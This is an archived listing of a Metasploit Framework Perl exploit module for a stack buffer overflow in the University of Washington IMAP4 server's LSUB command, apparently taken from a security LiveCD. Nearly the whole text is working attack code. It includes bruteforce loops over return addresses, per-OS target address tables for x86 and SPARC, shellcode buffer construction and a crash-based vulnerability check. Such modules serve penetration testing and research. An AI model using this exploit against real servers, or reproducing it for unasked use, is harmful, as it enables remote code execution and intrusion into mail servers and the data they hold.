home *** CD-ROM | disk | FTP | other *** search

---

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / usr / lib / metasploit / exploits / uow_imap4_lsub.pm

< prev

next >

Wrap

Text File  |  2006-06-30  |  5KB  |  200 lines

---

1.  
2. ##
3. # This file is part of the Metasploit Framework and may be redistributed
4. # according to the licenses defined in the Authors field below. In the
5. # case of an unknown or missing license, this file defaults to the same
6. # license as the core Framework (dual GPLv2 and Artistic). The latest
7. # version of the Framework can always be obtained from metasploit.com.
8. ##
9.  
10. package Msf::Exploit::uow_imap4_lsub;
11. use base "Msf::Exploit";
12. use strict;
13. use Pex::Text;
14.  
15. my $advanced = { };
16. my $info =
17.   {
18.     'Name'  => 'University of Washington IMAP4 LSUB Overflow',
19.     'Version'  => '$Revision: 1.21 $',
20.     'Authors' => [ 'vlad902 <vlad902 [at] gmail.com>', ],
21.  
22.     'Arch'  => [ 'x86', 'sparc' ],
23.     'OS'    => [ 'bsd', 'linux' ],
24.     'Priv'  => 0,
25.  
26.     'UserOpts'  =>
27.       {
28.         'RHOST' => [1, 'ADDR', 'The target address'],
29.         'RPORT' => [1, 'PORT', 'The target port', 143],
30.         'USER'  => [1, 'DATA', 'User name'],
31.         'PASS'  => [1, 'DATA', 'Password'],
32.         'SSL'   => [0, 'BOOL', 'Use SSL'],
33.       },
34.  
35.     'Payload' =>
36.       {
37.         'Space'  => 680,
38.         'MinNops'=> 400,
39.         'BadChars'  => "\x00/",
40.         'Keys'   => ['+findsock', '+inetd'],
41.       },
42.  
43.     'Description'  => Pex::Text::Freeform(qq{
44.         This exploits a buffer overflow in the LSUB command. An overly long
45.         argument causes a classic stack buffer overflow.
46. }),
47.  
48.     'Refs'  =>
49.       [
50.         ['BID', '1110'],
51.         ['OSVDB', '12037'],
52.         ['MIL', '71'],
53.       ],
54.  
55.     'Targets' =>
56.       [
57.         [ "Linux / x86 stack bruteforce", 0, 0xbffffdfc, 0xbfa00000, 400, 1064, \&Payloadx86 ],
58.         [ "FreeBSD / x86 stack bruteforce", 0, 0xbfbffdfc, 0xbf100000, 400, 1064, \&Payloadx86 ],
59.         [ "Linux+FreeBSD+NetBSD / x86 heap bruteforce", 1, 0x0804d000, 0x081f0000, -400, 1064, \&Payloadx86 ],
60.  
61. # These 2 could be consolidated and you'd get 5-6 useless hits on Linux but it's better this way.
62.         [ "Linux / sun4m stack bruteforce", 0, 0xefffeca0, 0xefa00000, 744, 1104, \&PayloadSPARC ],
63.         [ "NetBSD / sun4m stack bruteforce", 0, 0xeffffca0, 0xefa00000, 744, 1104, \&PayloadSPARC ],
64.         [ "OpenBSD / sun4m stack bruteforce", 0, 0xf7fffca0, 0xf7a00000, 744, 1104, \&PayloadSPARC ],
65.       ],
66.  
67.     'Keys'  => ['imap'],
68.  
69.     'DisclosureDate' => 'Apr 16 2000',
70.   };
71.  
72. sub new {
73.     my $class = shift;
74.     my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
75.     return($self);
76. }
77.  
78. sub Exploit {
79.     my $self = shift;
80.     my $target_idx  = $self->GetVar('TARGET');
81.     my $shellcode   = $self->GetVar('EncodedPayload')->Payload;
82.  
83.     my $target = $self->Targets->[$target_idx];
84.  
85.     my $curr_ret;
86.  
87.     $self->PrintLine(sprintf("[*] Starting bruteforce mode for target %s.", $target->[0]));
88.  
89.     for (
90.         $curr_ret  = $target->[2];
91.         ($target->[1] == 0 && $curr_ret >= $target->[3]) || ($target->[1] == 1 && $curr_ret <= $target->[3]);
92.         $curr_ret -= $target->[4]
93.       )
94.     {
95.         if(!($curr_ret & 0xff) || ($curr_ret & 0xff) == 0x20)
96.         {
97.             $curr_ret += 8;
98.         }
99.         if(!($curr_ret & 0xff00) || ($curr_ret & 0xff00) == 0x2000)
100.         {
101.             $curr_ret -= 0x0100;
102.         }
103.  
104.         my $s = Login($self);
105.         if($s == -1)
106.         {
107.             return;
108.         }
109.  
110.         $self->PrintLine(sprintf("[*] Trying return address 0x%.8x...", $curr_ret));
111.         $s->Send(sprintf("1 LSUB \"\" {%i}\r\n", $target->[5]));
112.         $s->Recv(-1);
113.         $s->Send($target->[6]->($curr_ret, $shellcode) . "\r\n");
114.  
115.         $self->Handler($s);
116.         $s->Close();
117.         undef($s);
118.     }
119.  
120.     return;
121. }
122.  
123. sub Check {
124.     my $self = shift;
125.  
126.     my $s = Login($self);
127.     if($s == -1)
128.     {
129.         return;
130.     }
131.  
132.     $s->Send("1 LSUB \"\" {1096}\r\n");
133.     $s->Recv(-1);
134.     $s->Send(Pex::Text::AlphaNumText(1096) . "\r\n");
135.     my $reply = $s->Recv(-1);
136.  
137.     if(!$reply)
138.     {
139.         $self->PrintLine("[*] Vulnerable server.");
140.         return $self->CheckCode('Confirmed');
141.     }
142.  
143.     $self->PrintLine("[*] Server is probably not vulnerable.");
144.     return $self->CheckCode('Safe');
145. }
146.  
147. sub Login {
148.     my $self = shift;
149.  
150.     my $user = $self->GetVar('USER');
151.     my $pass = $self->GetVar('PASS');
152.  
153.     my $sock = Msf::Socket::Tcp->new
154.       (
155.         'PeerAddr'  => $self->GetVar('RHOST'),
156.         'PeerPort'  => $self->GetVar('RPORT'),
157.         'LocalPort' => $self->GetVar('CPORT'),
158.         'SSL'       => $self->GetVar('SSL'),
159.       );
160.     if ($sock->IsError) {
161.         $self->PrintLine('[*] Error creating socket: ' . $sock->GetError);
162.         return -1;
163.     }
164.  
165.     $sock->Recv(-1);
166.     $sock->Send(sprintf("1 LOGIN \"%s\" \"%s\"\r\n", $user, $pass));
167.     my $reply = $sock->Recv(-1);
168.     if(!$reply || $reply !~ /1 OK/)
169.     {
170.         $self->PrintLine('[*] Authentication failed.');
171.         return -1;
172.     }
173.     undef($reply);
174.  
175.     return $sock;
176. }
177.  
178. sub Payloadx86 {
179.     my $ret = shift;
180.     my $sc = shift;
181.  
182.     my $buf;
183.  
184.     # XXX: More precise.
185.     $buf = $sc . pack("V", $ret) x 96;
186.  
187.     return $buf;
188. }
189.  
190. sub PayloadSPARC {
191.     my $ret = shift;
192.     my $sc = shift;
193.  
194.     my $buf;
195.  
196.     $buf = substr($sc, 0, 1032 - 680) . $sc . pack("N", $ret - 32) x 15 . pack("N", $ret) x 3;
197.  
198.     return $buf;
199. }
200.